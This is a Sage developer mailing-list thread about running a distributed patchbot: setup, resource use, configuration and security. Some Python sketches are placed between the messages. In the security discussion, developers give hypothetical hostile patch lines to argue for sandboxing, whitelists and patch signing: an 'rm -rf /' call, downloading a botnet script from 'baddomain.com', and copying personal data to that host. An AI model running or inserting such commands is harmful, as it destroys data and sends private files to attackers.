1) Download and build a pristine copy of Sage for testing.
2) Apply http://trac.sagemath.org/sage_trac/ticket/12486 to the
sage-scripts directory.
3) Run sage --patchbot
Everyone's results will be consolidated at
http://patchbot.sagemath.org/ . Hopefully this will allow us to get
results from a wide variety of architectures, platforms, and versions.
- Robert
Whatever it takes to build/test Sage these days for RAM, plus disk
space for a single Sage install + 100MB/ticket disk.
> * Does this distributed patchbot always delete the patches when it's
> done?
It keeps them around until the ticket is closed. It could be worth
making this configurable.
> * Can one stop the patchbot if one wants to do something else on the
> computer without ill effect?
Yes. The ticket will be marked as "pending" for the next 12 hours or
so if you never report any results, but that's the only ill effect.
You can also specify hours of the day that you want it to run, e.g.
"22-7,10-16" for 10pm-7am, 10am-4pm. Day of week could be valuable as
well.
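
To make the hour-range format concrete, here is a minimal sketch of how a spec like "22-7,10-16" could be interpreted. It is not taken from patchbot.py: the function names are hypothetical, and treating each range as half-open (start included, end excluded) is an assumption.

```python
def parse_hours(spec):
    """Parse a spec such as "22-7,10-16" into a list of (start, end) hour pairs."""
    ranges = []
    for part in spec.split(","):
        start, end = part.strip().split("-")
        ranges.append((int(start) % 24, int(end) % 24))
    return ranges


def hour_allowed(hour, spec):
    """Return True if `hour` (0-23) falls inside any range of `spec`.

    Assumption: each range is half-open, [start, end). A range whose
    start is later than its end (e.g. 22-7) wraps around midnight.
    """
    for start, end in parse_hours(spec):
        if start <= end:
            if start <= hour < end:
                return True
        elif hour >= start or hour < end:  # range wraps past midnight
            return True
    return False
```

A caller could pass `time.localtime().tm_hour` as `hour` to decide whether to start the next ticket.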
> * What kind of network authorization would be needed?
You need to be able to connect to http://patchbot.sagemath.org and
http://trac.sagemath.org/
> * Firewalls?
> * Etc.
Nothing else really, though some precaution should be taken as you're
building and running arbitrary code (by default from people with a
trac account and a previously accepted patch, though you can customize
this as well).
> Some stuff seems less than 100% doctested as well :)
Yeah, there's lots of room for improvement, but waiting around until I
have time to add everything I'd like to hasn't worked out the last 6
months, and my life is about to get a whole lot busier, so it's time
to get this out and let other people use and contribute too.
> But it's a great idea, if this is as easy as doing sage --patchbot and
> letting it run over a weekend.
Yep, that's the goal.
- Robert
There are maybe two tweaks to these directions I'd suggest:
(2a) I wasn't sure what the sage-scripts directory was; there's
nothing by that name in my 4.8. There's a sage_scripts spkg but it
seems to put a lot of stuff in local/bin, which seems to work.
(2b) To avoid a "Permission denied" error when running sage
--patchbot, you have to make patchbot.py executable.
The second one's obvious, the first one took me a few minutes to find
the right directory.
Doug
Yep.
> (2b) To avoid a "Permission denied" error when running sage
> --patchbot, you have to make patchbot.py executable.
>
> The second one's obvious, the first one took me a few minutes to find
> the right directory..
D'oh, hg export doesn't preserve the permission bit by default.
Ironically, both of these points are very relevant to the recent "log
messages" thread.
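
For anyone hitting the "Permission denied" error, a small sketch of restoring the execute bit from Python follows. The helper name is hypothetical, and the location of patchbot.py is an assumption; the thread only says the scripts end up somewhere under local/bin.

```python
import os
import stat


def make_executable(path):
    """Add the execute bits for user, group, and other, like `chmod a+x`."""
    mode = os.stat(path).st_mode
    os.chmod(path, mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
```

Usage would be `make_executable(path_to_patchbot_py)`, where the path is wherever the patch put patchbot.py in your install.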
On Fri, Feb 10, 2012 at 12:16 PM, kcrisman <kcri...@gmail.com> wrote:
> Thanks so much for the answers to all this, Robert.
>
>> > What are the resource requirements on something like this? For
>> > example,
>>
>> > * How many free MB should be always available?
>>
>> Whatever it takes to build/test Sage these days for RAM, plus disk
>> space for a single Sage install + 100MB/ticket disk.
>
> Hmm, 100MB per ticket is actually nontrivial on older machines.
True, though for modern hardware, this comes out to about $0.01/ticket.
>> > * Does this distributed patchbot always delete the patches when it's
>> > done?
>>
>> It keeps them around until the ticket is closed. It could be worth
>> making this configurable.
>
> For sure on older machines.
>
>> > * Can one stop the patchbot if one wants to do something else on the
>> > computer without ill effect?
>>
>> Yes. The ticket will be marked as "pending" for the next 12 hours or
>> so if you never report any results, but that's the only ill effect.
>> You can also specify hours of the day that you want it to run, e.g.
>> "22-7,10-16" for 10pm-7am, 10am-4pm. Day of week could be valuable as
>> well.
>
> I would have *never* guessed this from the patch! I finally found
> where this happens. Maybe you could post a "sample" conf file to the
> ticket as well using all the options; that would be a middle ground
> between the current patch and full docs.
See line 360+ of patchbot.py for the "default" config file. I'll try
to answer any other questions anyone has as well which should also
help fill the gap.
> On a more personal note, I am always amazed by the programming ability
> and motivation of some of the core developers, naturally including
> yourself and all the things you've contributed over the years.
> Jeroen's release script and Jason's work on the notebook/Sagecell come
> to mind too. I can only watch in admiration - way to go!
Thanks!
> Is the "get a whole lot busier" due to child # x, for some x>2?
Yep, numbers 3 and 4. Any day now...
- Robert
I'll start one on the KAIST Sage server (sagenb.kaist.ac.kr), an 8-core
Xeon machine running Ubuntu 10.04.3.
We should definitely do this on skynet and the OS X machines at the UW
(sqrt5.cs.washington.edu or whatever). Getting automatic testing on all
those machines would be great.
Dan
--
--- Dan Drake
----- http://mathsci.kaist.ac.kr/~drake
-------
See the attached log. On my machine, sandpile.py *always* times out. I
will try running the patchbot with a longer SAGE_TIMEOUT, but perhaps it
should recover a bit more gracefully from this situation. (Assuming the
timeout caused the exception.)
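
One possible reading of "recover more gracefully" is to report a timeout as an ordinary result instead of letting an exception escape. The sketch below illustrates that idea with the standard library only. It is not how the patchbot or `sage -t` handles timeouts; the function name and result strings are hypothetical.

```python
import subprocess
import sys


def run_with_timeout(cmd, timeout_seconds):
    """Run `cmd` and return (status, returncode).

    status is "ok", "failed", or "timed out"; returncode is None on timeout.
    """
    try:
        proc = subprocess.run(cmd, timeout=timeout_seconds)
    except subprocess.TimeoutExpired:
        # subprocess.run kills the child before re-raising, so nothing lingers.
        return ("timed out", None)
    return ("ok" if proc.returncode == 0 else "failed", proc.returncode)
```

A caller can then record "timed out" for the one slow file and carry on with the rest.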
If sandpile.py *always* times out on your machine, this is the
expected behavior. I think at this point manual intervention is
required. Or was there something else you were thinking it should do
(because clearly you were surprised, which isn't the intent).
- Robert
It does always time out. The regular doctests take 1300 seconds for
sandpile.py! I need to figure out what's going on there.
> I think at this point manual intervention is required. Or was there
> something else you were thinking it should do (because clearly you
> were surprised, which isn't the intent).
Well, I wasn't *too* surprised. I guess I was hoping for everything to
work perfectly with no intervention. But it does seem to be working now,
with a longer timeout.
Yikes!
I'm still worried -- what if some jerk posts a patch to trac that contains
sage: os.system('rm -rf /')
Got you!
I think a patch like the above is a very real possibility. All that
would have to happen would be for one of the 500 trac accounts (which
sometimes have very dumb passwords) to be compromised, or for somebody
to get a trac account, and boom -- some users running a patchbot lose
everything. That's not a pretty thought.
We could at least check that $HOME appears to be nearly empty, when
the patchbot starts up, suggesting that this isn't the user's normal
account. Or we could require that the username contain some string
like "sage", again forcing the user to at least make a special account
for the patchbot.
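
A rough sketch of the two startup checks suggested above. Nothing like this is known to exist in the patchbot; the function names, the threshold of 5 entries, and the choice to ignore dotfiles are all assumptions made for illustration.

```python
import getpass
import os


def home_nearly_empty(home, max_entries=5):
    """True if `home` holds at most `max_entries` non-hidden entries."""
    visible = [name for name in os.listdir(home) if not name.startswith(".")]
    return len(visible) <= max_entries


def username_has_marker(username, marker="sage"):
    """True if the account name contains `marker` (case-insensitive)."""
    return marker in username.lower()


def current_account_looks_dedicated():
    """Apply both heuristics to the account running this process."""
    home = os.path.expanduser("~")
    return home_nearly_empty(home) or username_has_marker(getpass.getuser())
```

Either check is easy to fool and only guards against accidents, not against a malicious patch.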
-- William
>
> Now I'm looking for where the patchbot might have left some residue of
> its doings so that I can make sure this doesn't happen again (perhaps
> by setting some configuration thingie). But I can really only find
> the local/bin/patchbot folder, which doesn't seem to have a log.
>
> So I now have two questions:
>
> 1) Can I configure so that it runs ONE thread at a time? I noticed it
> was running 3 threads... on a machine with one processor at < 1 GHz.
> I didn't see a place for setting this in the patchbot - is that the
> "parallelism": 3 setting? Perhaps "doctest_threads" or something
> could be an alternate setting. In any case, this should be a little
> more sophisticated than 3 as a default - maybe number of cores +1 or
> something. I hope this is what the problem I had was.
>
> 2) Is there a log? Or more precisely, is there one on *my* machine?
>
> 3) Finally, although http://patchbot.sagemath.org/ticket/ is pretty
> nice, I couldn't find a way to do a query for what my particular
> machine had tested. http://patchbot.sagemath.org/ticket/?base=4.8
> would be it, but that's pretty broad, and you have to click on a
> ticket to see which machines did it.
>
> Thanks! Overall this should be very helpful, though, especially for
> checking whether things apply to more recent alphas/betas.
>
> - kcrisman
>
--
William Stein
Professor of Mathematics
University of Washington
http://wstein.org
or
sage: email('SPAM MESSAGE')
hahaha
or
sage: os.system('wget ...') # download rootkit
pwned!
or
sage: os.system("wget http://baddomain.com/joinbotnet.sh")
sage: os.system("scp allyourpersonaldata.tar.gz baddomain.com")
sage: os.system("joinbotnet.sh")
I would definitely want this thing sandboxed as much as possible,
preferably running on a virtual machine that is completely firewalled
off from the net, except communication with the patch server.
Really, if you are running a patchbot, you are giving everyone in the
world permission to execute arbitrary code as the patchbot user.
Jason
A virtual machine would be really good because it will normalize
*what* computer the tests are being run on. It's bad because of the
same reason, I guess.
But if the point of lots of people running patchbots is that we don't
have enough compute power on sage.math to do it, then using a
virtual machine seems like by far the best option. If it is to test on
a wide variety of OS/hardware combinations, then it is a bad option.
-- William
:(. There are log files in $SAGE_ROOT/logs/xxxx-log.txt . Still, it's
just running sage -tp 3.
> So I now have two questions:
>
> 1) Can I configure so that it runs ONE thread at a time? I noticed it
> was running 3 threads... on a machine with one processor at < 1 GHz.
> I didn't see a place for setting this in the patchbot - is that the
> "parallelism": 3 setting?
OK, that might explain it. Yes, set "parallelism": 1. And of course
run it under nice as well.
> Perhaps "doctest_threads" or something
> could be an alternate setting. In any case, this should be a little
> more sophisticated than 3 as a default - maybe number of cores +1 or
> something. I hope this is what the problem I had was.
Note that it's for building as well as doctesting, so I think
"parallelism" is a fine name. Defaulting to number of cores + 1 could be
a bad default for a shared machine with lots of cores (and 2 may not
be the best default for a 1-core machine). But, yes, it could be more
intelligent.
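
As one illustration of a "more intelligent" default, the sketch below uses the core count but caps it, so a single-core machine gets 1 and a large shared machine is not swamped. This is a hypothetical policy, not what patchbot.py does; the function name and the cap of 3 (chosen to match the current default) are assumptions.

```python
import os


def default_parallelism(cores=None, cap=3):
    """Pick a thread count: the number of cores, but never more than `cap`."""
    if cores is None:
        # os.cpu_count() may return None if the count cannot be determined.
        cores = os.cpu_count() or 1
    return max(1, min(cores, cap))
```

The result could be used as the fallback when the config does not set "parallelism" explicitly.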
> 2) Is there a log? Or more precisely, is there one on *my* machine?
Yep, see above.
> 3) Finally, although http://patchbot.sagemath.org/ticket/ is pretty
> nice, I couldn't find a way to do a query for what my particular
> machine had tested. http://patchbot.sagemath.org/ticket/?base=4.8
> would be it, but that's pretty broad, and you have to click on a
> ticket to see which machines did it.
+1, I've wanted this too, but never got around to implementing it.
(Should be easy.) Note that the tickets are sorted in "last activity"
order.
> Thanks! Overall this should be very helpful, though, especially for
> checking whether things apply to more recent alphas/betas.
Yep. People can run patchbots on a variety of architectures and
versions of Sage.
- Robert
I would think that these are the set of files that would be most
likely to be tested by a user before submitting... the advantage of
the patchbot is that it tests everything, catching unexpected
breakages, and doing the long-running work without manual
intervention. But this could be useful for running it manually (but
should *not* give an "all tests passed" result until all tests are
run).
- Robert
It turns out that sage.math does have enough compute power to keep up,
though not always with low latency, and being able to test against
different versions is useful too. But the main point is to test a wide
variety of OS/hardware combinations.
- Robert
Hence my previous comment:
"Precaution should be taken as you're
building and running arbitrary code (by default from people with a
trac account and a previously accepted patch, though you can customize
this as well)."
I should have been stronger.
For most of its life, the patchbot executed code from a whitelist of
authors, which is a good place to start (but requires a fair amount of
manual maintenance). Unfortunately, this doesn't cover the issue of
account compromise. Ideally we would sign patches and then we could
check the signatures. Something like code.google.com or github would
provide stronger authentication guarantees than our own trac server.
And of course running things in a jail/vm/separate account is
worthwhile.
> We could at least check that $HOME appears to be nearly empty, when
> the patchbot starts up, suggesting that this isn't the user's normal
> account. Or we could require that the username contain some string
> like "sage", again forcing the user to at least make a special account
> for the patchbot.
That's not a bad idea. I think we should have a strong VM to test
everything, and individuals can test more "trusted" patches with their
own thresholds of security.
- Robert
True.
>> the patchbot is that it tests everything, catching unexpected
>> breakages, and doing the long-running work without manual
>> intervention. But this could be useful for running it manually (but
>> should *not* give an "all tests passed" result until all tests are
>> run).
>
> Well, that would be a feature request in any case. But is there syntax
> yet for doing
>
> sage --patchbot -t 12345
>
> ? This would seem to solve the problem of having to manually add
> patch files (I assume this would be one of the advantages of the "pull"
> system) and then automatically tests them to boot.
This is really getting into the fact that our workflow is so
cumbersome we want to adapt the patchbot to do stuff like this.
> Then one could
> avoid the hacker problem.
>
> Of course, that sort of misses the point of the patchbot in general.
> But VMs can't totally help, because presumably some of the point is
> different/weird OS/architectures, right? Could there be a way to
> strip for which user uploaded said patches and have a whitelist of
> those, at least as a configuration item?
Yes, that's implemented. By default it only tries patches uploaded
from users who uploaded patches in previously merged tickets, but you
can set the trusted_authors to any list of (trac) users you want.
Being able to specify a list of trusted ticket numbers (taking a
snapshot of the patches at that point) could be handy too.
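
The whitelist rule can be pictured with a short sketch. Only the option name trusted_authors comes from this thread; the function, the data shapes, and the rule that a ticket with no patches is not tested are assumptions for illustration.

```python
def ticket_is_trusted(uploaders, trusted_authors):
    """True only if the ticket has patches and every uploader is trusted."""
    uploaders = set(uploaders)
    return bool(uploaders) and uploaders <= set(trusted_authors)
```

For example, with `trusted_authors = ["alice", "bob"]` (made-up trac names), a ticket with patches from alice and bob would be tested, while one that also has a patch from an unknown uploader would be skipped.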
> (User names in the patch
> itself could be easily faked, of course.) Or maybe a whitelist of
> tickets... I don't know that anyone would want to maintain these,
> though.
The best option is signing patches and a whitelist of trusted users.
We could even allow it to be transitive, i.e. I'll trust anyone that
William trusts.
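
Transitive trust amounts to reachability in a "who trusts whom" graph. The following is a minimal sketch under that assumption; the function name and the dictionary layout are hypothetical, and a real scheme would still need signatures to prove who uploaded what.

```python
from collections import deque


def transitively_trusted(trusts, me):
    """Return everyone reachable from `me` by following trust edges.

    `trusts` maps a user to the users they trust directly. The result
    excludes `me`. Cycles are handled by tracking visited users.
    """
    seen = {me}
    queue = deque([me])
    while queue:
        person = queue.popleft()
        for other in trusts.get(person, ()):
            if other not in seen:
                seen.add(other)
                queue.append(other)
    seen.discard(me)
    return seen
```

The resulting set could be fed straight into trusted_authors.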
And of course even then a separate account, etc. is still valuable.
- Robert